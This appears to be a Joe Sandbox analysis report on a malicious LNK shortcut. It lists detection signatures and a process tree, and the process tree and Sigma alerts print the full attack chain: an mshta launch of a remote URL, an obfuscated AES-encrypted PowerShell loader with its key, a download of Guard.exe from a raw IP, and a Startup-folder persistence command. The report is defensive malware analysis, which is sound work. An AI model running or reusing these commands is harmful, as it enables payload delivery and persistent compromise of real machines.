Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
R8CAg00Db8.lnk

Overview

General Information

Sample name:R8CAg00Db8.lnk
renamed because original name is a hash value
Original sample name:cdbfcc4d882ca6b35d7429cebc384245.lnk
Analysis ID:1577880
MD5:cdbfcc4d882ca6b35d7429cebc384245
SHA1:ef60efe666dc9eee33d4f847dde57aba34e78bd6
SHA256:245641a41fbc20b6ff8e1b199ac9af9a103d6e9215e352f3f9e3aedec889b9e4
Tags:lnkuser-abuse_ch
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Windows shortcut file (LNK) starts blacklisted processes
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Bypasses PowerShell execution policy
Drops PE files to the user root directory
Drops PE files with a suspicious file extension
Powershell drops PE file
Sigma detected: Execution from Suspicious Folder
Sigma detected: Execution of Powershell Script in Public Folder
Sigma detected: Parent in Public Folder Suspicious Process
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: WScript or CScript Dropper
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Windows shortcut file (LNK) contains suspicious command line arguments
AV process strings found (often used to terminate AV products)
Adds / modifies Windows certificates
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

Process Tree

  • System is w10x64
  • forfiles.exe (PID: 2108 cmdline: "C:\Windows\System32\forfiles.exe" /p C:\Windows\System32 /m cmmon32.exe /c "powershell . \*i*\*2\msh*e https://tiffany-careers.com/ghep1 MD5: 9BB67AEA5E26CB136F23F29CC48D6B9E)
    • conhost.exe (PID: 3852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 3620 cmdline: . \*i*\*2\msh*e https://tiffany-careers.com/ghep1 MD5: 04029E121A0CFA5991749937DD22A1D9)
      • mshta.exe (PID: 4412 cmdline: "C:\Windows\System32\mshta.exe" https://tiffany-careers.com/ghep1 MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
        • powershell.exe (PID: 1260 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function clean ($vuOOVEuV){return -split ($vuOOVEuV -replace '..', '0x$& ')};$ernnEW = clean('4C4392ECE516D550361614F1B8641852253A5A9044A308574B9B1D67D2AA2493F763385A53C21C962D73AF7A3A1A7644FEF103968D9CE4BE22CDCF4C9AAAA0D1156C1042714327D0DF9559DCEF92D952D1FED7FD44F342E94970DDD5132E30A64E35E4751324A276E21D098222A9D80B841DC7508B47242C8DE36693A37A446E45337CE1895E882872A68C1B8DC77B41FAE1F5DE0A8934D3A20E197DA6F27C6B095CECC866561B5408D27B35AD836E83E5CFCA3209303BBA973A0E0D9CD3E9998D23C90BFE13CC4BEFAE3250CE0200F86C96B61BB66F12DDB70731B13C3A28A955F482A02B32FF9A15DA1ECFBBBF793CC72EDB34A5A987FF46C0D61D6E31A789B13290EB3AD9E662512ADC0281C570BCCF12079609337C2B50C6FF3BD620E71911E95424327F329EB0DC1C6F5355D6B9A0C38A95701B7EFFFD3792E6A3BF2C09DFC231E806D1546112A4E3CA8C984F0E37455D4A9B1BF07168B9D0A2AA9CFED23A36201580A871CA7A00A0FF1092079C043208CA9D5FB2B2CD7B9D78A4DB3176B4A187FC2B0A69302794F7EF5CF7B38EA290D6A3FD0FED4D1A7CFA6F9F2ABEB4968B37732EBE6F7B5D433925FCC54BCF9F0751476C4A1F7381FCAB8207125C23DF8455AB2E13D85EB368A1619B06BF2DA9EAAD111EFB8AEEDDEFD41D80A23271E7E72E7A5905A7C4F3CF522315763C528146A5D8861258033777A0C5EBD195000561C965AA4AC7B18EAD7327CE25B8624E927D2D5D7FDDC36C21B9772937ED991F17813F0F3A8422D3AF278FAD8A504D97390558B4C0E09B3F0AFAEB83FF0ED68659D2D0133F372F5CCA602FCFC65D5B169F7EFD754CC9B688D5590926DABC2E7CF00A4B3C64F8492DDBC72D696028CEA4EF1497C9951F051DD47FBA7AA633AE4216D74BB6544091543B7A4C88AA7D7449070259AA42EF74061F08CAEB6D24698FD62B73C9B854EF540BE2BC1197A260BC8EFAC5EB1F66809412345727AAA19E00AA6AB2B0AE4E8E2214D612DCF3CC187893D8E4EFA843640E5F762AF24639A3DA6573BCBFAAD965B1008B1DA5762FE0C1DEE2B3BC73609EABEB3867D7830D8FF386594BAC138E1F2B5BF3E19010CCEB41ED303E01E3AC4371CCB141E9B798EC90619F0930690897751682C457CE95E208E0D89FCFA0C3A2F215F55C4AFA67942C7969C7EC45757A3F2B843201BA5896CE084ECF029902929420A5A605DCAE06D0E20817E54A84154B910E2A7E99DCE88C63234F53567ECD466A94DB5A936652CFB9B2A1733BB00337D0AD339944F80BA2AFFF40DFE5A067255BCBBA6FDD8FDF8857B0D56E86B756F7C329B1C464F95203B87123A10F7826ED9D32686CD372031EB990E0F919E47B5551BDA69E3DE02837FD75820E2A01F6A7D0AC1F71A9F7457ADE2919759EEA4F517ADD7A983D85B4AB3F976B6B347C72A9F8CE4E17746B79C374BCF7DA567F5D6193036C3A9147BFBF55BD54659FD8DD5702914E8D495DF4376BC0D1E4380DFAEDE844E819363C215834E1E687ABC854482303E7F2A9138B86EA3385D31DA2D6CFAF1C47A1284645A362744A4C2705A1D4B9163FD1BFB07A0A75F1E0DB2117DE25DEDCE3420754D43D6D88BC61EAB468CDACE4EBC10E259AF12DED9C8A0C34E0A2EFB4BD9481FBB751CAA484B894364EA30FC61BF09678F49094CAE7B13B5DC645845DAD9D5663D049F75C8C5C48BD68780101A2414A8D606C6B1B06274EC46254D163CDB2BE295BC7899CDCFF4B92A1A447ACF4B39C8E69');$oZcBKP = [System.Security.Cryptography.Aes]::Create();$oZcBKP.Key = clean('614A73516F706C757242416C6E617351');$oZcBKP.IV = New-Object byte[] 16;$nFAfpwETU = $oZcBKP.CreateDecryptor();$jftLKJake = [Text.Encoding]::UTF8.GetString($nFAfpwETU.TransformFinalBlock($ernnEW, 0,$ernnEW.Length)); & $jftLKJake.Substring(0,3) $jftLKJake.Substring(3) MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 2304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • Acrobat.exe (PID: 4904 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\Marketing.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
            • AcroCEF.exe (PID: 7336 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
              • AcroCEF.exe (PID: 7528 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2096 --field-trial-handle=1684,i,8099529981057222917,3572816472393853467,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
          • PefjSkkhb.exe (PID: 8120 cmdline: "C:\Users\user\AppData\Roaming\PefjSkkhb.exe" MD5: 567DE19C0E7E3A1FC845E51AC1C1D5D8)
            • powershell.exe (PID: 8176 cmdline: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/kiiMf" -OutFile "C:\Users\Public\Guard.exe"" MD5: 04029E121A0CFA5991749937DD22A1D9)
              • conhost.exe (PID: 6028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 4484 cmdline: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
              • conhost.exe (PID: 3340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • Guard.exe (PID: 7936 cmdline: "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3 MD5: 18CE19B57F43CE0A5AF149C96AECC685)
                • cmd.exe (PID: 7712 cmdline: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                  • conhost.exe (PID: 6028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 6632 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • wscript.exe (PID: 4136 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • SwiftWrite.pif (PID: 5800 cmdline: "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G" MD5: 18CE19B57F43CE0A5AF149C96AECC685)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 1260INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0xffafb:$b1: ::WriteAllBytes(
  • 0x100298:$b1: ::WriteAllBytes(
  • 0x75e4:$b3: ::UTF8.GetString(
  • 0x82ec:$b3: ::UTF8.GetString(
  • 0x8eba:$b3: ::UTF8.GetString(
  • 0x54b75:$b3: ::UTF8.GetString(
  • 0x54cc2:$b3: ::UTF8.GetString(
  • 0x6f51c:$b3: ::UTF8.GetString(
  • 0xe483e:$b3: ::UTF8.GetString(
  • 0xe53eb:$b3: ::UTF8.GetString(
  • 0x13b400:$b3: ::UTF8.GetString(
  • 0x13b448:$b3: ::UTF8.GetString(
  • 0x14335b:$b3: ::UTF8.GetString(
  • 0x143f25:$b3: ::UTF8.GetString(
  • 0x144cf4:$b3: ::UTF8.GetString(
  • 0x145a7d:$b3: ::UTF8.GetString(
  • 0x145bd0:$b3: ::UTF8.GetString(
  • 0x1b1d5e:$b3: ::UTF8.GetString(
  • 0x1b290b:$b3: ::UTF8.GetString(
  • 0x1b38e7:$b3: ::UTF8.GetString(
  • 0x1bc595:$b3: ::UTF8.GetString(

Sigma Signatures

System Summary

barindex
Sigma detected: Execution from Suspicious Folder
Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3 , CommandLine: "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3 , CommandLine|base64offset|contains: , Image: C:\Users\Public\Guard.exe, NewProcessName: C:\Users\Public\Guard.exe, OriginalFileName: C:\Users\Public\Guard.exe, ParentCommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4484, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3 , ProcessId: 7936, ProcessName: Guard.exe
Sigma detected: Execution of Powershell Script in Public Folder
Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", CommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\PefjSkkhb.exe" , ParentImage: C:\Users\user\AppData\Roaming\PefjSkkhb.exe, ParentProcessId: 8120, ParentProcessName: PefjSkkhb.exe, ProcessCommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", ProcessId: 4484, ProcessName: powershell.exe
Sigma detected: Parent in Public Folder Suspicious Process
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit, CommandLine: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit, CommandLine|base64offset|contains: rg, Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3 , ParentImage: C:\Users\Public\Guard.exe, ParentProcessId: 7936, ParentProcessName: Guard.exe, ProcessCommandLine: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit, ProcessId: 7712, ProcessName: cmd.exe
Sigma detected: Potentially Suspicious PowerShell Child Processes
Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\mshta.exe" https://tiffany-careers.com/ghep1, CommandLine: "C:\Windows\System32\mshta.exe" https://tiffany-careers.com/ghep1, CommandLine|base64offset|contains: , Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: . \*i*\*2\msh*e https://tiffany-careers.com/ghep1, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3620, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\mshta.exe" https://tiffany-careers.com/ghep1, ProcessId: 4412, ProcessName: mshta.exe
Sigma detected: Script Interpreter Execution From Suspicious Folder
Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", CommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\PefjSkkhb.exe" , ParentImage: C:\Users\user\AppData\Roaming\PefjSkkhb.exe, ParentProcessId: 8120, ParentProcessName: PefjSkkhb.exe, ProcessCommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", ProcessId: 4484, ProcessName: powershell.exe
Sigma detected: Suspicious Invoke-WebRequest Execution
Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/kiiMf" -OutFile "C:\Users\Public\Guard.exe"", CommandLine: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/kiiMf" -OutFile "C:\Users\Public\Guard.exe"", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\PefjSkkhb.exe" , ParentImage: C:\Users\user\AppData\Roaming\PefjSkkhb.exe, ParentProcessId: 8120, ParentProcessName: PefjSkkhb.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/kiiMf" -OutFile "C:\Users\Public\Guard.exe"", ProcessId: 8176, ProcessName: powershell.exe
Sigma detected: Suspicious MSHTA Child Process
Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function clean ($vuOOVEuV){return -split ($vuOOVEuV -replace '..', '0x$& ')};$ernnEW = clean('4C4392ECE516D550361614F1B8641852253A5A9044A308574B9B1D67D2AA2493F763385A53C21C962D73AF7A3A1A7644FEF103968D9CE4BE22CDCF4C9AAAA0D1156C1042714327D0DF9559DCEF92D952D1FED7FD44F342E94970DDD5132E30A64E35E4751324A276E21D098222A9D80B841DC7508B47242C8DE36693A37A446E45337CE1895E882872A68C1B8DC77B41FAE1F5DE0A8934D3A20E197DA6F27C6B095CECC866561B5408D27B35AD836E83E5CFCA3209303BBA973A0E0D9CD3E9998D23C90BFE13CC4BEFAE3250CE0200F86C96B61BB66F12DDB70731B13C3A28A955F482A02B32FF9A15DA1ECFBBBF793CC72EDB34A5A987FF46C0D61D6E31A789B13290EB3AD9E662512ADC0281C570BCCF12079609337C2B50C6FF3BD620E71911E95424327F329EB0DC1C6F5355D6B9A0C38A95701B7EFFFD3792E6A3BF2C09DFC231E806D1546112A4E3CA8C984F0E37455D4A9B1BF07168B9D0A2AA9CFED23A36201580A871CA7A00A0FF1092079C043208CA9D5FB2B2CD7B9D78A4DB3176B4A187FC2B0A69302794F7EF5CF7B38EA290D6A3FD0FED4D1A7CFA6F9F2ABEB4968B37732EBE6F7B5D433925FCC54BCF9F0751476C4A1F7381FCAB8207125C23DF8455AB2E13D85EB368A1619B06BF2DA9EAAD111EFB8AEEDDEFD41D80A23271E7E72E7A5905A7C4F3CF522315763C528146A5D8861258033777A0C5EBD195000561C965AA4AC7B18EAD7327CE25B8624E927D2D5D7FDDC36C21B9772937ED991F17813F0F3A8422D3AF278FAD8A504D97390558B4C0E09B3F0AFAEB83FF0ED68659D2D0133F372F5CCA602FCFC65D5B169F7EFD754CC9B688D5590926DABC2E7CF00A4B3C64F8492DDBC72D696028CEA4EF1497C9951F051DD47FBA7AA633AE4216D74BB6544091543B7A4C88AA7D7449070259AA42EF74061F08CAEB6D24698FD62B73C9B854EF540BE2BC1197A260BC8EFAC5EB1F66809412345727AAA19E00AA6AB2B0AE4E8E2214D612DCF3CC187893D8E4EFA843640E5F762AF24639A3DA6573BCBFAAD965B1008B1DA5762FE0C1DEE2B3BC73609EABEB3867D7830D8FF386594BAC138E1F2B5BF3E19010CCEB41ED303E01E3AC4371CCB141E9B798EC90619F0930690897751682C457CE95E208E0D89FCFA0C3A2F215F55C4AFA67942C7969C7EC45757A3F2B843201BA5896CE084ECF029902929420A5A605DCAE06D0E20817E54A84154B910E2A7E99DCE88C63234F53567ECD466A94DB5A936652CFB9B2A1733BB00337D0AD339944F80BA2AFFF40DFE5A067255BCBBA6FDD8FDF8857B0D56E86B756F7C329B1C464F95203B87123A10F7826ED9D32686CD372031EB990E0F919E47B5551BDA69E3DE02837FD75820E2A01F6A7D0AC1F71A9F7457ADE2919759EEA4F517ADD7A983D85B4AB3F976B6B347C72A9F8CE4E17746B79C374BCF7DA567F5D6193036C3A9147BFBF55BD54659FD8DD5702914E8D495DF4376BC0D1E4380DFAEDE844E819363C215834E1E687ABC854482303E7F2A9138B86EA3385D31DA2D6CFAF1C47A1284645A362744A4C2705A1D4B9163FD1BFB07A0A75F1E0DB2117DE25DEDCE3420754D43D6D88BC61EAB468CDACE4EBC10E259AF12DED9C8A0C34E0A2EFB4BD9481FBB751CAA484B894364EA30FC61BF09678F49094CAE7B13B5DC645845DAD9D5663D049F75C8C5C48BD68780101A2414A8D606C6B1B06274EC46254D163CDB2BE295BC7899CDCFF4B92A1A447ACF4B39C8E69');$oZcBKP = [System.Security.Cryptography.Aes]::Create();$oZcBKP.Key = clean('614A73516F706C757242416C6E617351');$oZcBKP.IV = New-Object byte[] 16;$nFAfpwETU = $oZcBKP.CreateDecryptor();$jftLKJake = [Text.Encoding]::UTF8.GetString($nFAfpwETU.TransformFinalBlock($ernnEW, 0,$ernnEW.Length)); & $jftLKJake.Sub
Sigma detected: WScript or CScript Dropper
Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , ProcessId: 4136, ProcessName: wscript.exe
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Source: File createdAuthor: Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 8176, TargetFilename: C:\Users\Public\Guard.exe
Sigma detected: Change PowerShell Policies to an Insecure Level
Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function clean ($vuOOVEuV){return -split ($vuOOVEuV -replace '..', '0x$& ')};$ernnEW = clean('4C4392ECE516D550361614F1B8641852253A5A9044A308574B9B1D67D2AA2493F763385A53C21C962D73AF7A3A1A7644FEF103968D9CE4BE22CDCF4C9AAAA0D1156C1042714327D0DF9559DCEF92D952D1FED7FD44F342E94970DDD5132E30A64E35E4751324A276E21D098222A9D80B841DC7508B47242C8DE36693A37A446E45337CE1895E882872A68C1B8DC77B41FAE1F5DE0A8934D3A20E197DA6F27C6B095CECC866561B5408D27B35AD836E83E5CFCA3209303BBA973A0E0D9CD3E9998D23C90BFE13CC4BEFAE3250CE0200F86C96B61BB66F12DDB70731B13C3A28A955F482A02B32FF9A15DA1ECFBBBF793CC72EDB34A5A987FF46C0D61D6E31A789B13290EB3AD9E662512ADC0281C570BCCF12079609337C2B50C6FF3BD620E71911E95424327F329EB0DC1C6F5355D6B9A0C38A95701B7EFFFD3792E6A3BF2C09DFC231E806D1546112A4E3CA8C984F0E37455D4A9B1BF07168B9D0A2AA9CFED23A36201580A871CA7A00A0FF1092079C043208CA9D5FB2B2CD7B9D78A4DB3176B4A187FC2B0A69302794F7EF5CF7B38EA290D6A3FD0FED4D1A7CFA6F9F2ABEB4968B37732EBE6F7B5D433925FCC54BCF9F0751476C4A1F7381FCAB8207125C23DF8455AB2E13D85EB368A1619B06BF2DA9EAAD111EFB8AEEDDEFD41D80A23271E7E72E7A5905A7C4F3CF522315763C528146A5D8861258033777A0C5EBD195000561C965AA4AC7B18EAD7327CE25B8624E927D2D5D7FDDC36C21B9772937ED991F17813F0F3A8422D3AF278FAD8A504D97390558B4C0E09B3F0AFAEB83FF0ED68659D2D0133F372F5CCA602FCFC65D5B169F7EFD754CC9B688D5590926DABC2E7CF00A4B3C64F8492DDBC72D696028CEA4EF1497C9951F051DD47FBA7AA633AE4216D74BB6544091543B7A4C88AA7D7449070259AA42EF74061F08CAEB6D24698FD62B73C9B854EF540BE2BC1197A260BC8EFAC5EB1F66809412345727AAA19E00AA6AB2B0AE4E8E2214D612DCF3CC187893D8E4EFA843640E5F762AF24639A3DA6573BCBFAAD965B1008B1DA5762FE0C1DEE2B3BC73609EABEB3867D7830D8FF386594BAC138E1F2B5BF3E19010CCEB41ED303E01E3AC4371CCB141E9B798EC90619F0930690897751682C457CE95E208E0D89FCFA0C3A2F215F55C4AFA67942C7969C7EC45757A3F2B843201BA5896CE084ECF029902929420A5A605DCAE06D0E20817E54A84154B910E2A7E99DCE88C63234F53567ECD466A94DB5A936652CFB9B2A1733BB00337D0AD339944F80BA2AFFF40DFE5A067255BCBBA6FDD8FDF8857B0D56E86B756F7C329B1C464F95203B87123A10F7826ED9D32686CD372031EB990E0F919E47B5551BDA69E3DE02837FD75820E2A01F6A7D0AC1F71A9F7457ADE2919759EEA4F517ADD7A983D85B4AB3F976B6B347C72A9F8CE4E17746B79C374BCF7DA567F5D6193036C3A9147BFBF55BD54659FD8DD5702914E8D495DF4376BC0D1E4380DFAEDE844E819363C215834E1E687ABC854482303E7F2A9138B86EA3385D31DA2D6CFAF1C47A1284645A362744A4C2705A1D4B9163FD1BFB07A0A75F1E0DB2117DE25DEDCE3420754D43D6D88BC61EAB468CDACE4EBC10E259AF12DED9C8A0C34E0A2EFB4BD9481FBB751CAA484B894364EA30FC61BF09678F49094CAE7B13B5DC645845DAD9D5663D049F75C8C5C48BD68780101A2414A8D606C6B1B06274EC46254D163CDB2BE295BC7899CDCFF4B92A1A447ACF4B39C8E69');$oZcBKP = [System.Security.Cryptography.Aes]::Create();$oZcBKP.Key = clean('614A73516F706C757242416C6E617351');$oZcBKP.IV = New-Object byte[] 16;$nFAfpwETU = $oZcBKP.CreateDecryptor();$jftLKJake = [Text.Encoding]::UTF8.GetString($nFAfpwETU.TransformFinalBlock($ernnEW, 0,$ernnEW.Length)); & $jftLKJake.Sub
Sigma detected: Execution of Suspicious File Type Extension
